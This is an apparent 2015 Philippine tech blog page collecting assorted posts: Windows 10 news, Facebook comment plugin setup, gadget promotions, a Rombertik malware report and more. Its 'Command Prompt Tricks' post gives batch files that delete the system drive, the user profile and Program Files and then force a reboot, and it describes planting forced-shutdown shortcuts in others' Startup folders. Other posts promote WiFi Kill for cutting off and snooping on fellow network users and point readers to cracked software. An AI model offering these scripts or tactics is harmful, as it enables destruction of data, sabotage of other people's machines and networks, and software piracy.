This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Saturday, May 09, 2015

Windows 10 is the last version of Windows and will improve through regular updates

The company said it had yet to decide on what to call the operating system beyond Windows 10.
"There will be no Windows 11," warned Steve Kleynhans, a research vice-president at analyst firm Gartner who monitors Microsoft.

He said Microsoft had in the past deliberately avoided using the name "Windows 9" and instead chose Windows 10 as a way to signify a break with a past which involved successive stand-alone versions of the operating system.

However, he said, working in that way had created many problems for Microsoft and its customers.
"Every three years or so Microsoft would sit down and create 'the next great OS'," he said.

Jerry Nixon, a Microsoft development executive, said in a conference speech this week that Windows 10 would be the "last version" of the dominant desktop software.


Windows 10 Build 10130


His comments were echoed by Microsoft which said it would update Windows in future in an "ongoing manner".
Instead of new stand-alone versions, Windows 10 would be improved in regular instalments, the firm said.
Mr Nixon made his comments during Microsoft's Ignite conference held in Chicago this week.
In a statement, Microsoft said Mr Nixon's comments reflected a change in the way that it made its software.
"Windows will be delivered as a service bringing new innovations and updates in an ongoing manner," it said, adding that it expected there to be a "long future" for Windows.

Microsoft is instead changing the way it distributes improvements for the operating system in the future. Instead of releasing a whole new version every few years, as it's done until now, Microsoft plans to improve Windows through regular updates.

Windows 10 Preview
http://windows.microsoft.com/en-ph/windows/preview-iso






The old Facebook Comments plugin will stop working replace with new improve plugin

The Comments Plugin lets people comment on content on your site using their Facebook account. If people wish to they can share this activity to their friends in News Feed as well. It also contains built-in moderation tools and special social relevance ranking.

A new version of the Comments plugin was introduced with the release of Graph API v2.3.

To enable the new version of the Comments plugin you either need to load the version 2.3 of the Facebook SDK for JavaScript or define the v2.3 in the data-version attribute of the Comments plugin tag:





<div class="fb-comments" data-href="{url}" data-version="v2.3"></div>

If you do not manually upgrade till June 23rd 2015 all your Comments plugin implementations will automatically upgrade to the new version.


You can use sample scripts
You should insert it directly after the opening <body> tag on each page you want to load it:

<div id='fb-root'/>
    <script>
      //<![CDATA[
      window.fbAsyncInit = function() {
        FB.init({
          appId : 'CHANGE THIS WITH YOUR APP ID',
          status : true, // check login status
          cookie : true, // enable cookies to allow the server to access the session
          xfbml : true // parse XFBML
        version : 'v2.3' // sdk version
        });
      };
      (function() {
        var e = document.createElement('script');
        e.src = document.location.protocol + 'connect.facebook.net/en_US/sdk.js';
        e.async = true;
        document.getElementById('fb-root').appendChild(e);
      }());
      //]]>
    </script>

There are two ways to navigate to the Moderation tool:

App-based Moderation View: Visit the URL developers.facebook.com/tools/comments. You will get a list of all your Facebook apps, which enables you to moderate all comments tied to the corresponding app. If you do not use a Facebook app for your Comments plugin, you will not be able to use this view.

Page-based Moderation View: Click the Moderation Tool link right next to a Comments box (see screenshot below). The view will only list comments posted to this page (URL).

If are using the App-based Moderation View you can use the dropdown to switch between apps.

In the moderation table you can either approve or hide comments depending on their status. To change the status of multiple comments use the checkboxes in the left column.

OLD DASHBOARD

On this old dashboard  (version 2.0) its hard to moderate , you can't tell where that comment came from or what blog page it was posted..


NEW DASHBOARD

 On this new dashboard its easy to moderate block hide and view where that comment came from.
You can also view the thread.



You may also like to read

Facebook Comment Moderation Guide:
http://www.blogmytuts.net/2013/01/facebook-comment-box-moderation-guide.html







2015 WonderFox Mother's Day Giveaway Vaild before Jun 1

Except for sending flowers and cooking for mom, to enjoy unforgettable movies with her is also a wonderful option. With this simple utility, it is a no-brainer for watching DVD movies on TV, iPhone, iPad or any portable devices, just bid farewell to DVD Player and tons of discs.

The Main Features about WonderFox DVD Video Converter

WonderFox DVD Video Converter is a powerful all-in-one utility integrated by DVD Ripper, Video Converter,
Video Downloader, Video Editor, Ringtone Studio and etc.
New feature - Senior Version has been embedded in version 8.2.
It is easy to use and has a friendly & intuitive interface even for novice and seniors.


It provides one-stop multimedia solution to rip the latest released DVDs, convert video to 200+ formats or devices, download online video and make ringtone for iOS&Android devices. It also provide 50x fast conversion speed without quality loss. In addition, our product is in a reasonable price with good quality.

http://www.videoconverterfactory.com/download/mothersday/dvc-senior-giveaway.zip


And here's our Mother's Day giveaway  flagship product "WonderFox DVD Video Converter", please check it out.
http://www.videoconverterfactory.com/promotion.html

Watch this video below to learn more about WonderFox DVD Video Converter Senior Mode:



For more info:
http://www.videoconverterfactory.com/dvd-video-converter/

Friday, May 08, 2015

How to Fix MyBro GreenPacket DV-235t All Lights OFF

Tips MyBr0  DV-235t
Ginamit mo ngayon kinaumagahan biglang nawala ilaw?
No WiFi , No LAN , NO POWER
Binunot mo saksakan tapos ni replug mo, umilaw lahat tapos namatay ang ilaw?
Kinutuban ka na remote:
Baka hindi na remote yan BUG lang sa Hardware and software- over use.
 
Diagnose:
1.Un PLUG POWER CABLE
2.PRESS RESET HOLD (PRESS MO MATAGAL)
3.PLUG POWER CABLE (wag mo bibitawan yung reset)
4.OBSERVE THE LIGHT
* iilaw lahat
*after 30 iilaw yung isa ..
*mag rereboot.
*observe mo LAN status ng computer kung nag reread.
OK payan MybRO mo Sir grin emoticon wag mo i flush

Minsan nang yayari din yan sa ibang router lalo na yung ibang na stock.


Di ako makapag change mac  sa Mybro or GP?
gamit ka ng pang open or back door .. sample tools a available sa internet  chicnagatas or media karne hindi ka mag kaka problema dyan kung inopen muna yung Telnet before ka mag upgrade..



EO Smart Connecting Car 2 capable of shrinking, driving sideways

A team of German engineers have come up with an ingenious solution -- a "flexible" electric vehicle capable of shrinking, driving sideways (think like a crab) and turning on a dime.

First announced in 2012, the team have moved onto their second iteration of the vehicle. It drives like a traditional car but because each wheel is powered by its own motor, it also has the capability of driving sideways, allowing it to slide into tight spaces in urban areas where parking is limited, explains Timo Birnschein, project manager for the vehicle.

He adds: "The whole process -- the transition between normal driving and driving sideways -- takes about four seconds."


The EO Smart Connecting Car 2 is an innovative design from DFKI Robotics Innovation Center, based in Bremen, Germany, where a team of software developers and designers, as well as electronics and construction engineers, have been refining the smart micro car project for the last three years.

Technical Details


  • Size:    2,5 m x 1,57 m x 1,6 m; 2 m x 1,57 m x 2,25 m respectively
  • Weight:    750 kg
  • Power supply:    54V – LiFePo4 battery
  • Speed:    65 km/h (40 mph)
  • Actuation/ Engine:    4 x 4kW wheelhub motors; 10 x longstroke-Lineardrive with 5000N 1 x Folding Servo
  • Sensors:   
  • Hall-effect as well as string potentiometer sensors for angle and length measurement
  • Stereo-Kameras at the front and at the back
  • 32-Line Lidar for 3D-scans of the environment
  • 6 ToF 3D cameras for near field overview
  • Communication:    CAN-Bus RS232 RS485 LAN

 The prototype has a top speed of 65 km/h (or 40mph) and can travel 50 to 70 kilometers (30 to 44 miles) on a single four-hour full charge of the battery. But it's the two-seater's ability to shrink to around 1.5 meters in length that has the team excited about its uses in future cities, says Birnschien.

"It is able to reduce it's own size by about 80cm, which makes it almost as small as a bike in length. And with this kind of feature you can go into very tiny parking spaces," he says. "You are still able to turn on the spot, you are still able to drive sideways and you are still able to connect to charging stations, for example."

Looking like part "Transformer" and part DeLorean out of "Back to the Future," the car reduces its size by partly folding itself. It shifts the rear axle to the front and slides on a set of rails which raises the interior upwards, while still remaining comfortable for the passenger.

Touted as a "micro car for a megacity," the team are working hard to make their vehicle roadworthy and envision it as a communal public resource, similar to existing urban car-sharing schemes. The idea is that when you need a car, you could head to your nearest docking station and select the vehicle that's charged enough to drive the distance you need. It would then detach itself and you would be on your way.

"[It] is very comparable feature-wise to the first prototype," says Birnschein. "The second version is much more reliable and almost road-legal. It's not really, but it's almost there and we are trying to bring this car to the road -- but it's a big hassle to be honest because we have so many new technologies in the car that the technical advisory guys are skeptical."

He adds that the team have invited several manufacturers to test drive the vehicle, with positive response, but the enthusiasm ends there.

"The problem is for most car manufacturers, they are not really interested if they didn't invent it themselves. They may buy from Bosch or Siemens or whatever, technology parts like ESP and other things, but not complete systems."

But his team remain undeterred as they continue working on autonomous features like auto pilot and self parking. Meanwhile Birnschein likens the situation to the rise in smartphones over the last decade -- from non-existence to oversaturation.

"It will be the same with computer power and autonomy," he says. "In the next 10 years we will most likely see autonomous cars from big car manufacturers -- Mercedes S class will have autonomous functions within three or four years. Some of other manufacturers like GM announced they will have semi-autonomous cars by 2020. And many other car manufacturers are already working on this type of technology.

"They are driving all the time on the autobahn with autonomous vehicles. I believe it will be coming -- it will be there within the next decade."

 source:


Hacker Text Scam King Arrested in Manila Philippines

Hacker Text Scam King Arrested

NBI raid  a house in Manila with a legitimate search warrant Hacker and Text Scam King Roan Sia Alias Mark Tan.
Modos he will send random text message on all mobile network subscribers (Globe, Smart) here and abroad.
He will pretend as a relative of the victim and ask for money (Pasa Load).
Over 50 cellphone he use to operate this scam then send all the Load Credit on his Mobile Sim in Hand.
Then he will in-cash the money using money transaction of the said Mobile Network.
When NBI check his mobile phone balance Over 100 Million Pesos Load  found.


A few minutes latter a messenger (abi drie )also arrested delivering illegal WiFi and Modem for Mark Tan.
Mark Tan sell this item online with unlimited Internet connection no monthly bill.

 source : GMA News









Xiaomi introduces an affordable Redmi 2 phone that is thinner, lighter, and faster

Xiaomi has announced that its eagerly-awaited Redmi 2 smartphone will soon be available in the Philippines.  Priced at ₱5,999, the Redmi 2 will first go on sale on April 28 via www.lazada.com.ph/mi.

Feature-packed but still affordable, the Redmi 2 brings a powerful smartphone experience closer to more people.




Here are some of the amazing features Mi Fans can expect from the Redmi 2:
  • ·         4.7” display similar to the Redmi 1S, but thinner at 9.4mm and lighter at 133g
  • ·         4G dual SIM and dual standby capability
  • ·         Fast and fluid performance even under heavy use, with a Quad-core 64-bit Snapdragon 410 processor, Adreno 306 GPU, 1GB RAM and 8GB Flash (expandable to 32GB)
  • ·         Gorgeous 4.7” 1280 x 720 HD screen (312 PPI), protected by AGC Dragontrail glass
  • ·         Sharp and clear 8MP BSI f/2.2 rear camera and a 2MP BSI front camera with 720p video recording
  • ·         Long battery life made possible by a 2200mAh battery
  • ·         OTG support to transfer files quickly and connect peripherals
  • ·         A soft-touch matte back cover that is fingerprint and grease-resistant
  • ·         MIUI 6  that enables new functions, shortcuts, customizations and animations 

Lazada Philippines




Thursday, May 07, 2015

Command Prompt Tricks

This will teach you how to do CMD.
CMD is the original MS-DOS command prompt, the Shell.
Command Prompt is one of the most powerful tools in Windows; but sadly, it is also the most ignored one. Things were not always like this; but with the advent of GUI based operating systems, people started feeling that computing through command based tools was boring. This ultimately lead the command prompt into obscurity.

Batch files, with a .BAT extension, are BATCHes of MS-DOS commands, executed togther.



Simple CMD  and Browser Bomber  with LOGS


1.Open A Notepad
2.Copy Paste  the code below.

:start1
start bmt.bat
start www.blogmytuts.net
dir /s/l/w
bmt > bmtLOGS.txt
go to start1

3. Save as bmt.bat

How it works?

start - to open
start www.blogmytuts.net   - This will open blogmytuts site on default browser
dir /s/l/w - This will open folder directory information
bmt > bmtLOGS.txt  - This will  save all the batch file done..
go to start1  - This will create  LOOP it will open continues batch file.

 Much Simple LOOP

open notepad.
then code it

only needs 3 lines.

:start
start name.bat
go to start


save as. name.bat

its an endless loop that constantly opens more endless loops.



The command above will NOT DO harm on your PC
If you want some more destructive one you can add

1. go to notepad and type the following:

@Echo off

2. Del C:\ *.*|y save it as Dell.bat



want worse then type the following:
@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as anyname.bat file

 3. This will del userprofile
@echo off
del %userprofile% /Q
del %ProgramFiles% /Q
del %system32%
shutdown -r 00 -t
exit

save as anyname.bat


 When I was a Kid , in computer shop  I put the shutdown batch file on startup folder when the computer start again or other player will come to use it... it will auto shutdown LOL .


Right click desktop
new>shortcut
shutdown -s -t 20 -f -c "shutting down..............." in the box
next
a name in the box
finish
copy paste on Startup folder wehehehe..







Command Prompt Powercfg

Powercfg is a very powerful command for managing and tracking how your computer uses energy. You can use the command “powercfg /hibernate on” and “powercfg /hibernate off” to manage hibernation, and you can also use the command “powercfg /a” to view the power-saving states currently available on your PC.

Another useful command is “powercfg /devicequery s1_supported” which displays a list of devices on your computer that support connected standby. When enabled, these devices can be used to bring your computer out of standby – even remotely. You can enable this by selecting the device in Device Manager, opening its properties, going to the Power Management tab and then checking the “Allow this device to wake the computer” box.





“Powercfg /lastwake” will show you what device last woke your PC from a sleep state. You can use this command to troubleshoot your PC if it seems to wake from sleep at random.

The “powercfg /energy” command can be used to build a detailed power consumption report for your PC, which is output to a directory indicated after the command finishes. This report will let you know of any system faults that might increase power consumption, like devices that are blocking certain sleep modes, or which aren’t properly configured to respond to your power management settings.




Windows 8 added “powercfg /batteryreport”, which provides a detailed analysis of battery use, if applicable. Normally output to your Windows user directory, the report provides details about the time and length of charge and discharge cycles, lifetime average battery life, and estimated battery capacity.






Rombertik Malware Auto Destroy Hard Drive When Detected

A new type of malware resorts to crippling a computer if it is detected during security checks, a particularly catastrophic blow to its victims.

The malware, nicknamed Rombertik by Cisco Systems, is designed to intercept any plain text entered into a browser window. It is being spread through spam and phishing messages, according to Cisco’s Talos Group blog on Monday.

Talos’ goal is to protect our customer’s networks.  Reverse engineering Rombertik helps Talos achieve that goal by better understanding how attackers are evolving to evade detection and make analysis difficult.  Identifying these techniques gives Talos new insight and knowledge that can be communicated to Cisco’s product teams.  This knowledge can then be used to harden our security products to ensure these anti-analysis techniques are ineffective and allow detection technologies to accurately identify malware to protect customers.





 Rombertik has been identified to propagate via spam and phishing messages sent to would-be victims.  Like previous spam and phishing campaigns Talos has discussed, attackers use social engineering tactics to entice users to download, unzip, and open the attachments that ultimately result in the user’s compromise.

While this file may appears to be some sort of PDF from the icon or thumbnail, the file actually is a .SCR screensaver executable file that contains Rombertik.  Once the user double clicks to open the file, Rombertik will begin the process of compromising the system.

Rombertik goes through several checks once it is up and running on a Windows computer to see if it has been detected.

That behavior is not unusual for some types of malware, but Rombertik “is unique in that it actively attempts to destroy the computer if it detects certain attributes associated with malware analysis,” wrote Ben Baker and Alex Chiu of the Talos Group.

Once loaded into the system, Rombertik first runs a series of anti-analysis checks to determine if it is running within a sandbox.
In case it isn’t running within the sandbox, Rombertik decrypts and installs itself on the victim's machine, which then allows the malware to launch a second copy of itself and overwrite the second copy with the malware's core spying functionality.


After completing this process and before begins spying on users, Rombertik runs a final check to make sure it is not being analyzed in memory. In case it finds any indication of being analyzed, the spyware attempts to destroy the master boot record (MBR) of the vulnerable computer.
Rombertik then restarts the machine, and because now the MBR is missing from the hard drive, the victim’s computer will go into an endless restart loop.

MBR is the first sector of a computer’s hard drive that the system looks for before loading the operating system. However, deleting or destroying MBR involves re-installing of operating system, which means valuable data is lost.
In cases where the malware is under the microscope of security experts or any rival malware author, Rombertik will self-destruct itself, taking the contents of a victim's hard drive along with it.

Security researchers reverse-engineered the malware and found that Rombertik contains volumes of "garbage code" that have to be analyzed. The researchers were able to capture a small sample and found that…
...the unpacked Rombertik sample was 28KB in size while the packed version is 1264KB, including 75 images and 8,000 functions that are never used.
Rombertik other Tricks involve:
Moreover, Rombertik keeps itself in sandboxes by writing a random byte of data to memory 960 million times in an effort to overwhelm analysis tools that try to detect malware by logging system activity.

"If an analysis tool attempted to log all of the 960 million write instructions, the log would grow to over 100 gigabytes," researchers explained in a blog post.

"Even if the analysis environment was capable of handling a log that large, it would take over 25 minutes just to write that much data to a typical hard drive. This complicates the analysis."

Data wiping and Self-destructing malware:

Data wiping and self-destructing malware are not new. In last three years, we have seen a hike in malware evasion capabilities.
Wiper malware was used against South Korean banks and TV broadcasters in 2013 as well as against Sony Pictures Entertainment last year, which marked history in a massive data breach.
Also last year, the German Aerospace Centre was targeted by a self-destructive malware in an espionage attack, believed to be conducted by China.




Wednesday, May 06, 2015

Real-Life Teddy Bears

“It’s a hybrid of a kangaroo, a koala, a sloth, a monkey, and a bear.” Conservation scientist Lisa Dabek is on the prowl for the unimaginably cute tree kangaroo of Papua New Guinea.

“When you’re a kid and you think of a very magical place, this is it,” says Lisa Dabek, picturing the lush Papua New Guinea cloud forest. Even the wildlife sounds like something out of a children’s book. “It’s kind of a hybrid of a kangaroo, a koala, a sloth, and a monkey. And a bear,” Dabek says, describing the elusive Matschie’s tree kangaroo.




Dabek is a National Geographic grantee and founder of the Tree Kangaroo Conservation Program at the Woodland Park Zoo. For almost 20 years she has dedicated her work to studying and preserving these animals, which are endangered by over-hunting and habitat loss. The indigenous people in the area of the Yopno, Uruwa, and Som Rivers (YUS) “hunt tree kangaroos for food—protein—and also for cultural use,” Dabek explains. But they are also playing an important role in revitalizing the species.

“New Guinea is unique in that over 90 percent of the land is owned by the local indigenous people. So we work with the YUS people to create this YUS Conservation Area, which serves as a wildlife bank. And so tree kangaroos are safe in the conservation area, and then the young can disperse into hunting areas.”

Researchers need to understand the animals’ behavior in order to establish an effective conservation area, but tree kangaroos are known as the “ghosts of the forest” for a reason, as they reside 100 feet up in the forest canopy and are incredibly difficult to observe. So Dabek is working with National Geographic’s Crittercam team to attach cameras to the mysterious critters to figure out how they spend their time.


source:



Globe myBusiness WiFi HOTSPOT With Ticketing Bill System

Most people need Wi-Fi access for their works, researches and communications. Therefore, the WG-500P offers you a robust and secure hotspot solution which is just perfect for the mini size venues such as café/ airport lounge/ store or shop. The WG-500P provide customizable billing profiles and internet access with time limit control which is based on our billing management.

Get the myBusiness WiFi Hub with a Fixed Internet Plan for only P1899/month, or as an add-on to your existing plan for only P299/month. Enjoy a WiFi Hub Device with up to 5Mbps DSL connection and Landline with unli calls to Globe/TM and Globe Landline.


http://mybusiness.globe.com.ph/wifihubinquire?gclid=CP2V7NWvrMUCFVglvQod_LUAew




WG-500P | Hotspot in a Printer

Wireless Subscriber Gateway with built-in thermal printer to generate user's account for Internet access and is perfect for small venue owners.Last year I already post about this device by AGN SOLUTION






LEARN MORE ABOUT THIS WG-500P DEVICE 


http://www.blogmytuts.net/2014/08/wg-500p-hotspot-in-printer-by-agn.html



You mas also want to read:






Fye Multi-functional Quartz Watch Gas Lighter for Men

They say the most stolen  item is Lighter , how about you put that Lighter on your wrist?

Description:

What a strange wristwatch! Have you ever seen such a cool watch? Having this watch means you can empty out your pockets and leave that lighter at home, as one lighter is built into the watch. This zinc alloy quartz movement watch lighter is born.

 

Main Features:

As a watch:
Round dial and soft rubber strap
Decorative small three non-functioning sub-dials
One crown at the flank to adjust the time
Built-in quartz movement guarantee precious time
As a lighter:
The lighter has brighter flame and adjustable
Using butane gas, can be repeated filling
Own it! You will find it’s good value for money


Specification:

General    
Watches categories     Male table
Watch style     Fashion
Available color     White, Black
Dial    
Movement type     Quartz watch
Shape of the dial     Round
Display type     Pointer
Case material     Alloy
Case color     Silver
Band    
Band material     Rubber
Clasp type     Pin buckle
Band color     Black
Function    

 

 

Special features     Decorating small three stitches

Weight and Size    
The dial thickness     1.6 cm / 0.6 inches
The dial diameter     4.5 cm / 1.8 inches
The band width     2.1 cm / 0.8 inches
Product weight     0.082 kg
Package weight     0.095 kg
Product size (L x W x H)     26.2 x 4.5 x 1.6 cm / 10.3 x 1.8 x 0.6 inches
Package size (L x W x H)     9.2 x 5.2 x 4.2 cm

Price :  USD $ 5.18

Users having trouble saving changes in the HTML code of their blogs

Blogger community having problem after  blogger.com update.

I  also experience this  unable to save  HTML  or recover  Blogtemplate

The Bug Start on MAY 4.

Blogger start looking for solution but none of them have fully fix the problem.

To avoid this BUG DO NOT EDIT your Template..



5 hours  ago  a blogger team representative posted  that they fix the problem.



I don't know how I did it .. But I fix  my template problem :v

Author share button and related post :v  I just trial and error all the way XD re upload original template then my backup template


They already fix the issue great!!











Tuesday, May 05, 2015

Solar Roadways of the Future

Scott Brusaw, a former electrical engineer, has figured out a way to turn solar panels in hexagons that can connect to create a road way.

He is calling the project Solar Roadways and wants to turn all the roads, sidewalks, and parking lots in America into solar powered energy farms, which can generate power for everyone. And that is not all these things can do. They can use their power to light up the road at night time or to send driving alerts to drivers who are on the road.


They can also be used to keep roadways cleaned and melt and snow that falls on them. In the cities they can be used to help power stop light and street lamps. The possibilities are seemingly limitless when you think about it. By putting the way we generate and transfer energy in the road we would eliminate overhead lines.



Scott Brusaw launched a highly successful indiegogo campaign which raised over 2 million dollars. So we should be seeing these roadways soon rather than later.

Check out the video below and see for yourself all the cool things these solar panels can do.

Don’t Forget To Share This Video.




WiFi Kill Pro (Rooted Android)

Having slow internet ?  too many WiFi client? Why Not Kill Them!!

Well, with this app you can disable internet connection for a device on the same network. So if someone (anyone) is abusing the internet wasting precious bandwidth for a Kpop video clips you could just kill their connection and stay happy with a full bandwidth just for yourself.

WiFiKill Apps needs rooted device

FEATURES

grabbing traffic, showing websites visited by grabbed device
showing bytes transferred by "grabbed device"
showing network names (netbios names) of devices
tablet friendly!
android 4.x only



http://q.gs/844647/wifikiller





Kerio Connect Load Balancing and Complete Firewall Software

Kerio Connect, formerly Kerio Mail Server, is a super-fast secure multiple domain mail server working with all POP3 and IMAP desktop mail clients for Windows, Linux and Mac. Kerio Connect comes with a powerful Web mail application to allow users to access email anywhere, comprehensive mobile device support, bundled McAfee AV protection, backup and archiving capabilities and much more.



Features

Cross-platform Collaboration

    Manage email and calendars using Microsoft Outlook
    Manage all groupware features from Internet Explorer, Safari or Firefox using the powerful Kerio WebMail web application
    Manage all groupware features using Microsoft Entourage on a Mac
    Natively support Apple iCal and Apple Address Book through CalDAV and CardDAV

 

Mobile Synchronisation

    Push email, calendars, contacts and tasks on to your user?s mobile devices
    Respond to meeting requests; send emails and more from your mobile device
    Delete data on your mobile device remotely using 'Smart Wipe' technology in the event that your mobile device is stolen or lost
    Kerio Connect supports a wide number of mobile devices including the Apple iPhone, Windows Mobile, Treo Palm, Blackberry, Symbian and Android devices (features vary per device model)

Advanced Security

    Block up to 98% of spam emails, comes with over 14 layers of spam protection including Directory Harvest Attack protection, SpamAssassin, anti-phishing and anti-spoofing, real-time blacklist servers, custom whitelists and blacklists, redirect Block list website, SMTP restrictions and more
    Up to 80% of spam can even be detected before it reaches the mail server, reducing resource requirements
    Integrated anti-virus protection from McAfee detects viruses in email attachments; even combine McAfee with a second virus engine of your choice for extra protection (plugin support for ClamAV, AVG, NOD32, Sophos and Avast)
 Autobalancing

 

Archiving Capabilities

    Archive all emails - local, incoming, outgoing and relayed, then search and sort through archives to ensure compliancy with corporate security policies

Automated Backup

    Schedule full backups and differential backups (backup only changed data) without stopping the mail server
    Restore user data and server configurations onto another Kerio Connect server
    Recover user's emptied deleted items with just a few clicks

Powerful Administration

    Install and setup in minutes
    Web based, graphical and intuitive administration for all settings, administer remotely through a secure channel
    Completely self contained functionality - does not depend on other SMTP, POP, IMAP, LDAP or HTTP services or applications
    Distributed Domain functionality enables administrators to manage a single email domain across multiple servers in separate locations.

 Redirect blocklist


I'm not providing crack version here but you can search  Kerio Winroute or Kerio Connect crack on Google or youtube.

How to setup:

1. Server PC with two LAN card...
a: Installation instruction
  •  LAN CARD#1  plug in modem or router  ISP.
  •  LAN CARD#2 plug hub or switch.


Monday, May 04, 2015

BIR increase Bloggers TAX from 2% to 15%

I receive a news letter from a Network Blog. about  a increase of TAX.


To all bloggers,
As we constantly cooperate with government agencies and institutions in order to provide better reporting and transparency with our network of bloggers, we have been advised by the Bureau of Internal Revenue to increase the withholding tax from the current 2% to 15%.
In this respect, we will apply the required 15% withholding tax on all payouts to bloggers in our network effective immediately.
In return, we will also provide for a Certificate of Creditable Tax Withheld at Source (BIR Form 2307) to reflect the amount withheld and remitted to the revenue bureau.


You may then use the Form 2307 as proof of partial tax payments when you file your returns.
Despite all these being performed, professional bloggers should be reminded that they are still required to file an income tax return to report income and to pay the difference between the tax withheld and the tax due on the income.



A Forest of Energy-Harvesting Trees

Scientists at VTT Technical Research Centre of Finland Ltd have developed a prototype of a tree that harvests solar energy from its surroundings - whether indoors or outdoors - stores it and turns it into electricity to power small devices such as mobile phones, humidifiers, thermometers and LED light bulbs. The technology can also be used to harvest kinetic energy from the environment.


The "leaves" of the tree are flexible, patterned solar panels made using a technique developed by VTT on a printing process. The leaves form an electronic system complete with wiring that conduct energy into a converter that feeds electricity to devices such as mobile phones or sensors analysing the environment.


The tree trunk is made with 3D technology by exploiting wood-based biomaterials VTT has developed.


VTT's technologies create endless opportunities for applications involving different kinds of electronics regarding lighting and energy harvesting, for example.

The more solar panels there are in a tree, the more energy it can harvest.


Watch the video:


The video is produced by VTT (htpp://www.vtt.fi) and created by ID BBN



Microsoft has created a website that tells you how old you look just by analyzing your photo

In a machine learning experiment that's taken social vanity to new heights, Microsoft has created a website that tells you how old you look just by analyzing your photo.

You're only as old as you think you are.

Or in this case, as old as a computer algorithm thinks you are.

Sometimes it's dead on. Other times it's hilariously, outrageously wrong.

It's simple: Upload a selfie, wait a few seconds -- then the machine gives you a number.

And since it can analyze anyone's photo, you can compare yourself to your friends, family, and foes.




MANNY AND FLOYD PICTURE


But guessing someone's age is a dangerous game, even for a robot. That's probably why the site comes with a sheepish apology. "Sorry if we didn't quite get the age and gender right," it says after each result.

The company unveiled the website at a conference Thursday as a way to show off its new software.

Part of a new initiative called Project Oxford, Microsoft says you could use this face detection technology for tasks like sorting through a large photo collection.

But we're human -- so we'll probably just use it to judge our own looks.

And everyone else's.

WEBSITE: http://how-old.net/